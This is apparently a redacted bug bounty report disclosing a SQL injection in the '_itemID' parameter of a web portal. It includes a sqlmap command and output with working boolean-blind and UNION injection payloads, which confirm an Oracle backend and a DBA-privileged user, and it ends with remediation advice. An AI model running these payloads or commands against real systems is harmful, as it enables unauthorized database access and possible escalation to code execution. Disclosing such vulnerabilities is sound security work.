SQL Injection vulnerability located at ████████

**Summary:** I have found a SQL Injection at ███████ in the ████ Portal. **Description:** The SQL injection is being caused by the unsanitized parameter of `_itemID=` i immediately stopped testing when i verified it was possible to get the Current user and version of the Database. 1.The vulnerable url is : `https://█████/███Portal/█████?_██████=true&_st=&_pageLabel=█████████_███████_pubview_page&CCD_itemID=201826*` 2. use sqlmap (https://github.com/sqlmapproject/sqlmap) with the following command ```python python sqlmap.py -u "https://██████/████████Portal/██████████?_█████=true&_st=&_pageLabel=███_██████_pubview_page&CCD_itemID=201826*" --random-agent --current-user --is-dba ``` sqlmap output : ``` --- Parameter: #1* (URI) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: https://███████:443/███████Portal/████?_███=true&_st=&_pageLabel=███_█████_pubview_page&CCD_itemID=201826 AND 2833=2833 Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: https://██████████:443/████Portal/██████████?_███=true&_st=&_pageLabel=███_██████████_pubview_page&CCD_itemID=201826 UNION ALL SELECT NULL,CONCAT(CONCAT('qvzxq','ODiUngdWPubxHGXaEEDvfcozGjVAMxIqpHmWfTVJ'),'qbbxq') FROM VERSIONS-- AQYh --- [22:37:56] [INFO] testing SAP MaxDB [22:37:57] [WARNING] the back-end DBMS is not SAP MaxDB [22:37:57] [INFO] testing MySQL [22:37:58] [WARNING] the back-end DBMS is not MySQL [22:37:58] [INFO] testing Oracle [22:37:59] [INFO] confirming Oracle [22:38:01] [INFO] the back-end DBMS is Oracle web application technology: Apache, Servlet 2.5, JSP, JSP 2.1 back-end DBMS: Oracle [22:38:01] [INFO] fetching current user current user: ██████████ [22:38:02] [INFO] testing if current user is DBA current user is DBA: True ``` ##Screenshot {F322498} ## Suggested Mitigation/Remediation Actions Sanitize the parameter of `_itemID=` through the use of prepared statements, or other forms of sanitizing. ## Impact It could be possible for an attacker to Retrieve data, and depending of the data being stored in the database(passwords) it could be possible to further pivot, and get RCE since the current user in the database has DBA rights.